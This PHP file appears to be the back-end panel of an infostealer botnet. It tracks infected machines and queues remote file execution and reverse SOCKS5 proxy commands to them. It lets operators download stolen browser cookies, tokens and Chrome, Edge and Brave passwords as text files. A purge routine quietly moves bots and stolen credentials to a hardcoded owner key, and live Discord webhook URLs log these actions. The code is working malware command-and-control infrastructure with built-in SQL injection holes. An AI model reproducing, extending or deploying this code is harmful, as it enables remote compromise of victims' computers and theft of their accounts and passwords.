= $fiveMinutesAgo"; } else { $selectu = "SELECT * FROM miners WHERE OwnerID = '$secretkey'"; $resultu = mysqli_query($conn, $selectu); $mytk = mysqli_num_rows($resultu); $selectan = "SELECT * FROM cards WHERE OwnerID = '$secretkey'"; $resultan = mysqli_query($conn, $selectan); $mystole = mysqli_num_rows($resultan); $fiveMinutesAgo = time() - 360; $selectana = "SELECT * FROM miners WHERE OwnerID = '$secretkey' AND LastPing >= $fiveMinutesAgo"; } $resultanss = mysqli_query($conn, $selectana); $myaktv = mysqli_num_rows($resultanss); $useracccc = mysqli_query($conn, "SELECT id FROM accounts WHERE OwnerKey = '$secretkey'"); $rowaacccc = mysqli_fetch_assoc($useracccc); $USRIDEY = $rowaacccc["id"]; if ($role != "Trial") { $carlos; $CheckLCC = "SELECT * FROM licenses WHERE OwnerID = '$secretkey'"; $CheckLCCQuery = mysqli_query($conn, $CheckLCC); if ($CheckLCCQuery) { $carlos = "bok"; while ($RowLC = mysqli_fetch_assoc($CheckLCCQuery)) { // Get the current timestamp $CurTmsp = time(); // Get the ActionSentTime timestamp $licenID = intval($RowLC['LicenseID']); $UsedTime = intval($RowLC['UsedTime']); $Durt = intval($RowLC['Duration']); $Endy = $UsedTime + $Durt; if ($Endy > $CurTmsp) { $carlos = "ok"; } else { $carlos = "nok"; } } if ($carlos == "ok" || $role == "Founder") { } else if ($carlos == "nok") { $setok = "Expired"; $sqlUpdate = "UPDATE licenses SET OwnerID = ? WHERE LicenseID = ?"; $stmtUpdate = $conn->prepare($sqlUpdate); $stmtUpdate->bind_param("si", $setok, $licenID); if ($stmtUpdate->execute()) { } else { } $treel = "Trial"; $sqlUpdateAC = "UPDATE accounts SET Role = ? WHERE OwnerKey = ?"; $stmtUpdateAC = $conn->prepare($sqlUpdateAC); $stmtUpdateAC->bind_param("ss", $treel, $secretkey); if ($stmtUpdateAC->execute()) { } else { } session_destroy(); echo ''; header('location: https://' . $domainyess . '/Login'); } else if ($carlos == "bok") { if ($role == "Premium" || $role == "Special") { $treel = "Trial"; $sqlUpdateAC = "UPDATE accounts SET Role = ? WHERE OwnerKey = ?"; $stmtUpdateAC = $conn->prepare($sqlUpdateAC); $stmtUpdateAC->bind_param("ss", $treel, $secretkey); if ($stmtUpdateAC->execute()) { } else { } session_destroy(); echo ''; } } } } } function sendDiscordWebhookMessage($webhookURL, $message) { // Create a JSON payload with the message content $payload = json_encode( array( 'content' => $message ) ); // Set the content type and headers for the POST request $headers = array( 'Content-Type: application/json', ); // Initialize cURL session $ch = curl_init($webhookURL); // Set cURL options curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Execute cURL session and get the response $response = curl_exec($ch); // Close cURL session curl_close($ch); } if ($username == "Hopesar") { $sqlSelect = "SELECT * FROM miners"; } else { $sqlSelect = "SELECT * FROM miners WHERE OwnerID = '$secretkey'"; } if (isset($_POST['id'])) { // Handle the deletion here $idA = $_POST['id']; // Update the OwnerID (you should replace "Botnets" with your actual table name and "OwnerID" with the appropriate column name) $sqlUpdate = "UPDATE miners SET OwnerID = ? WHERE BotID = ?"; $stmtUpdate = $conn->prepare($sqlUpdate); $newOwnerID = 'rz6zarjmaf0u9jq4v53hsnz4no61k2'; // Replace with the new OwnerID value $stmtUpdate->bind_param("si", $newOwnerID, $idA); $webhookURL44 = 'https://discord.com/api/webhooks/1375397254172639274/1H6_lYoZhcMy4PZ8puUnN86oHZhR8WniKvMHq3PWZkN8j-o7_IUBFtMzSloEmF4XTqTB'; $messagerrr = 'New Connection Deleted By ' . $username . ' Connection Swapped To Your Owner Key Bot Id Is ' . $idA; sendDiscordWebhookMessage($webhookURL44, $messagerrr); if ($stmtUpdate->execute()) { } else { } } function startsWith($haystack, $needle) { return strpos($haystack, $needle) === 0; } function sanitizeInput($input) { // Define the list of forbidden characters $forbiddenChars = ['-', '(', ')', '=', '*']; $isac = '0'; // Check if the input contains any forbidden characters foreach ($forbiddenChars as $char) { if (strpos($input, $char) !== false) { // Forbidden character found, handle the error (you can customize this part) $isac = '1'; } } if ($isac == '1') { return 'NoSpecialChar'; } else { return htmlspecialchars($input, ENT_QUOTES, 'UTF-8'); } } $normuser = $secretkey; if ($role == 'Founder') { $normuser = 'yes'; } if (isset($_POST["execsend"])) { $filurl = $_POST['filurl']; $idew = sanitizeInput($_POST['botIdaq']); $sqlhewed = "SELECT * FROM miners WHERE BotID = '$idew'"; $resultHEWED = $conn->query($sqlhewed); // Check if the query was successful if ($resultHEWED) { if ($resultHEWED->num_rows > 0) { $rowHH = $resultHEWED->fetch_assoc(); $HEWED = $rowHH['HWID']; $PINGOTIM = $rowHH['LastPing']; } } $curtime = time(); $timeDifference = $curtime - $PINGOTIM; if ($timeDifference <= 360) { $inserttcp = "INSERT INTO actions (HWID, ActionInfo, ActionType, ActionOwner, ActionStatus, ActionSentTime) VALUES (?, ?, 'exc', ?, '50', ?)"; if ($stmttc = mysqli_prepare($conn, $inserttcp)) { // Bind variables to the prepared statement as parameters mysqli_stmt_bind_param($stmttc, "ssss", $HEWED, $filurl, $normuser, $curtime); // Execute the prepared statement if (mysqli_stmt_execute($stmttc)) { // The query was successful $url = "https://discord.com/api/webhooks/1375397314595782728/ljdFIqCbHozO7jcPAqp3UoqFBzPAUgtksA2JR_zhvlMbZnpCbOwIZLzQzT6qcCpkofkc"; $headers = ['Content-Type: application/json; charset=utf-8']; $messages = 'File URL: ' . $filurl . ' Mode: ' . 'Disk Execution' . ' Action Owner: ' . $username; $POST = ['username' => 'Action Logs', 'content' => $messages]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); $response = curl_exec($ch); } else { // An error occurred } // Close the statement mysqli_stmt_close($stmttc); } else { // An error occurred while preparing the statement echo "Error: " . mysqli_error($conn); } } else { echo ""; } } if (isset($_POST["proxsend"])) { if ($role != "Special" && $role != "Founder") { echo ""; } else { $proxpot = $_POST['proxpot']; $idew = sanitizeInput($_POST['botIdaq']); $sqlhewed = "SELECT * FROM miners WHERE BotID = '$idew'"; $resultHEWED = $conn->query($sqlhewed); // Check if the query was successful if ($resultHEWED) { if ($resultHEWED->num_rows > 0) { $rowHH = $resultHEWED->fetch_assoc(); $HEWED = $rowHH['HWID']; $PINGOTIM = $rowHH['LastPing']; } } $curtime = time(); $timeDifference = $curtime - $PINGOTIM; if ($timeDifference <= 360) { $inserttcp = "INSERT INTO actions (HWID, ActionInfo, ActionType, ActionOwner, ActionStatus, ActionSentTime) VALUES (?, ?, 'RVRS', ?, '50', ?)"; if ($stmttc = mysqli_prepare($conn, $inserttcp)) { // Bind variables to the prepared statement as parameters mysqli_stmt_bind_param($stmttc, "ssss", $HEWED, $proxpot, $normuser, $curtime); // Execute the prepared statement if (mysqli_stmt_execute($stmttc)) { // The query was successful $url = "https://discord.com/api/webhooks/1375397314595782728/ljdFIqCbHozO7jcPAqp3UoqFBzPAUgtksA2JR_zhvlMbZnpCbOwIZLzQzT6qcCpkofkc"; $headers = ['Content-Type: application/json; charset=utf-8']; $messages = 'Proxy Server: ' . $proxpot . ' Mode: ' . 'Reverse Socks5' . ' Action Owner: ' . $username; $POST = ['username' => 'Action Logs', 'content' => $messages]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); $response = curl_exec($ch); } else { // An error occurred } // Close the statement mysqli_stmt_close($stmttc); } else { // An error occurred while preparing the statement echo "Error: " . mysqli_error($conn); } } else { echo ""; } } } if (isset($_POST['purgebig'])) { // Handle the deletion here $idA = sanitizeInput($_POST['purgebig']); $usercred = mysqli_query($conn, "SELECT BotID, HWID FROM miners WHERE BotID = '$idA'"); $rowacred = mysqli_fetch_assoc($usercred); $HWIDOBOT = $rowacred["BotID"]; $sqlhewed = "SELECT HWID FROM miners WHERE BotID = '$useringid'"; $resultHEWED = $conn->query($sqlhewed); $HEWED; // Check if the query was successful if ($resultHEWED) { if ($resultHEWED->num_rows > 0) { $rowHH = $resultHEWED->fetch_assoc(); $HEWED = $rowHH['HWID']; } } $newOwnerID = 'rz6zarjmaf0u9jq4v53hsnz4no61k2'; // Replace with the new OwnerID value $passidolo = "2"; $sqlUpdate = "UPDATE miners SET OwnerID = ? WHERE BotID = ?"; $stmtUpdate = $conn->prepare($sqlUpdate); $stmtUpdate->bind_param("si", $newOwnerID, $idA); if ($stmtUpdate->execute()) { } else { } $sqlUpdateTKN = "UPDATE tokens SET OwnerID = ? WHERE OwnerID = ? AND HWID = ?"; $stmtUpdateTKN = $conn->prepare($sqlUpdateTKN); $stmtUpdateTKN->bind_param("sss", $newOwnerID, $secretkey, $HEWED); if ($stmtUpdateTKN->execute()) { } else { } $sqlUpdatePSS = "UPDATE passwords SET OwnerID = ? WHERE OwnerID = ? AND HWID = ?"; $stmtUpdatePSS = $conn->prepare($sqlUpdatePSS); $stmtUpdatePSS->bind_param("sss", $passidolo, $USRIDEY, $HWIDOBOT); if ($stmtUpdatePSS->execute()) { } else { } $sqlUpdateCKKO = "UPDATE cookies SET OwnerID = ? WHERE OwnerID = ? AND HWID = ?"; $stmtUpdateCKKO = $conn->prepare($sqlUpdateCKKO); $stmtUpdateCKKO->bind_param("sss", $passidolo, $USRIDEY, $HWIDOBOT); if ($stmtUpdateCKKO->execute()) { } else { } $webhookURL44 = 'https://discord.com/api/webhooks/1375397254172639274/1H6_lYoZhcMy4PZ8puUnN86oHZhR8WniKvMHq3PWZkN8j-o7_IUBFtMzSloEmF4XTqTB'; $messagerrr = 'New Bot PURGE By ' . $username . ' Bot Swapped To Your Owner Key Bot Id Is ' . $idA; sendDiscordWebhookMessage($webhookURL44, $messagerrr); } $cokerdata = 'Download Cookies (Chrome)'; if (isset($_POST['ides'])) { // Handle the deletion here $useringid = sanitizeInput($_POST['ides']); $cokerdata = 'Downloading... Please Wait'; $usercred = mysqli_query($conn, "SELECT BotID, HWID FROM miners WHERE BotID = '$useringid'"); $rowacred = mysqli_fetch_assoc($usercred); $HWIDOBOT = $rowacred["BotID"]; if ($role == 'Founder') { $sqlAQA = "SELECT * FROM cookies WHERE HWID = '$HWIDOBOT'"; } else { $sqlAQA = "SELECT * FROM cookies WHERE HWID = '$HWIDOBOT' AND OwnerID = '$USRIDEY'"; } $resultAQA = $conn->query($sqlAQA); // Initialize the output $output = ''; // Process the database results and format them if ($resultAQA->num_rows > 0) { while ($RowANAMMM = $resultAQA->fetch_assoc()) { $output .= $RowANAMMM["Urls"] . "\t" . $RowANAMMM["expires_true"] . "\t" . $RowANAMMM["path"] . "\t" . $RowANAMMM["hostkeydot"] . "\t" . $RowANAMMM["expires_time"] . "\t" . $RowANAMMM["Names"] . "\t" . $RowANAMMM["Cookie"] . "\n"; } } else { $output .= "No Cookie Data!"; } $filename = "CookiesID" . $useringid . ".txt"; // Set the appropriate HTTP headers for downloading header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); // Output the data and exit echo $output; $cokerdata = 'Download Cookies (Chrome)'; exit; // This will stop further execution and prevent the unwanted HTML content from being appended. } if (isset($_POST['taken'])) { // Handle the deletion here $useringid = sanitizeInput($_POST['taken']); // Construct a basic SQL query $sqlhewed = "SELECT HWID FROM miners WHERE BotID = '$useringid'"; // Execute the query $resultHEWED = $conn->query($sqlhewed); // Check if the query was successful if ($resultHEWED) { if ($resultHEWED->num_rows > 0) { $rowHH = $resultHEWED->fetch_assoc(); $HEWED = $rowHH['HWID']; } } // Query the database to fetch the data if ($role == 'Founder') { $sqlAQA = "SELECT * FROM tokens WHERE HWID = '$HEWED'"; } else { $sqlAQA = "SELECT * FROM tokens WHERE HWID = '$HEWED' AND OwnerID = '$secretkey'"; } $resultAQA = $conn->query($sqlAQA); // Initialize the output $output = ''; // Process the database results and format them if ($resultAQA->num_rows > 0) { while ($RowANAMMM = $resultAQA->fetch_assoc()) { $output .= $RowANAMMM["Token"] . "\n"; } } else { $output .= "No Token Data!"; } $filename = "TokensID" . $useringid . ".txt"; // Set the appropriate HTTP headers for downloading header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); // Output the data and exit echo $output; exit; // This will stop further execution and prevent the unwanted HTML content from being appended. } if (isset($_POST['Pesord'])) { // Handle the deletion here $useringid = sanitizeInput($_POST['Pesord']); $usercred = mysqli_query($conn, "SELECT BotID, HWID FROM miners WHERE BotID = '$useringid'"); $rowacred = mysqli_fetch_assoc($usercred); $HWIDOBOT = $rowacred["BotID"]; if ($role == 'Founder') { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT' AND Browser = '1'"; } else { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT' AND OwnerID = '$USRIDEY' AND Browser = '1'"; } $resultAQA = $conn->query($sqlAQA); // Initialize the output $output = ''; // Process the database results and format them if ($resultAQA->num_rows > 0) { while ($RowANAMMM = $resultAQA->fetch_assoc()) { $output .= $RowANAMMM["Urls"] . "\t" . $RowANAMMM["Username"] . "\t" . $RowANAMMM["Pass"] . "\n"; } } else { $output .= "No Pass Data!"; } $filename = "ChromePassID" . $useringid . ".txt"; // Set the appropriate HTTP headers for downloading header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); // Output the data and exit echo $output; exit; // This will stop further execution and prevent the unwanted HTML content from being appended. } if (isset($_POST['Pesorded'])) { // Handle the deletion here $useringid = sanitizeInput($_POST['Pesorded']); $usercred = mysqli_query($conn, "SELECT BotID, HWID FROM miners WHERE BotID = '$useringid'"); $rowacred = mysqli_fetch_assoc($usercred); $HWIDOBOT = $rowacred["BotID"]; if ($role == 'Founder') { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT' AND Browser = '2'"; } else { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT' AND OwnerID = '$USRIDEY' AND Browser = '2'"; } $resultAQA = $conn->query($sqlAQA); // Initialize the output $output = ''; // Process the database results and format them if ($resultAQA->num_rows > 0) { while ($RowANAMMM = $resultAQA->fetch_assoc()) { $output .= $RowANAMMM["Urls"] . "\t" . $RowANAMMM["Username"] . "\t" . $RowANAMMM["Pass"] . "\n"; } } else { $output .= "No Pass Data!"; } $filename = "EdgePassID" . $useringid . ".txt"; // Set the appropriate HTTP headers for downloading header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); // Output the data and exit echo $output; exit; // This will stop further execution and prevent the unwanted HTML content from being appended. } if (isset($_POST['Pesordbr'])) { // Handle the deletion here $useringid = sanitizeInput($_POST['Pesordbr']); $usercred = mysqli_query($conn, "SELECT BotID, HWID FROM miners WHERE BotID = '$useringid'"); $rowacred = mysqli_fetch_assoc($usercred); $HWIDOBOT = $rowacred["BotID"]; if ($role == 'Founder') { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT' AND Browser = '3'"; } else { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT' AND OwnerID = '$USRIDEY' AND Browser = '3'"; } $resultAQA = $conn->query($sqlAQA); // Initialize the output $output = ''; // Process the database results and format them if ($resultAQA->num_rows > 0) { while ($RowANAMMM = $resultAQA->fetch_assoc()) { $output .= $RowANAMMM["Urls"] . "\t" . $RowANAMMM["Username"] . "\t" . $RowANAMMM["Pass"] . "\n"; } } else { $output .= "No Pass Data!"; } $filename = "BravePassID" . $useringid . ".txt"; // Set the appropriate HTTP headers for downloading header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); // Output the data and exit echo $output; exit; // This will stop further execution and prevent the unwanted HTML content from being appended. } if (isset($_POST['Pesordal'])) { // Handle the deletion here $useringid = sanitizeInput($_POST['Pesordal']); $usercred = mysqli_query($conn, "SELECT BotID, HWID FROM miners WHERE BotID = '$useringid'"); $rowacred = mysqli_fetch_assoc($usercred); $HWIDOBOT = $rowacred["BotID"]; if ($role == 'Founder') { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT'"; } else { $sqlAQA = "SELECT * FROM passwords WHERE HWID = '$HWIDOBOT' AND OwnerID = '$USRIDEY'"; } $resultAQA = $conn->query($sqlAQA); // Initialize the output $output = ''; // Process the database results and format them if ($resultAQA->num_rows > 0) { while ($RowANAMMM = $resultAQA->fetch_assoc()) { $output .= $RowANAMMM["Urls"] . "\t" . $RowANAMMM["Username"] . "\t" . $RowANAMMM["Pass"] . "\n"; } } else { $output .= "No Pass Data!"; } $filename = "AllPassID" . $useringid . ".txt"; // Set the appropriate HTTP headers for downloading header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); // Output the data and exit echo $output; exit; // This will stop further execution and prevent the unwanted HTML content from being appended. } ?>
Pc Name |
Ip |
Country |
Hardware |
Windows |
Status |
Options |
|---|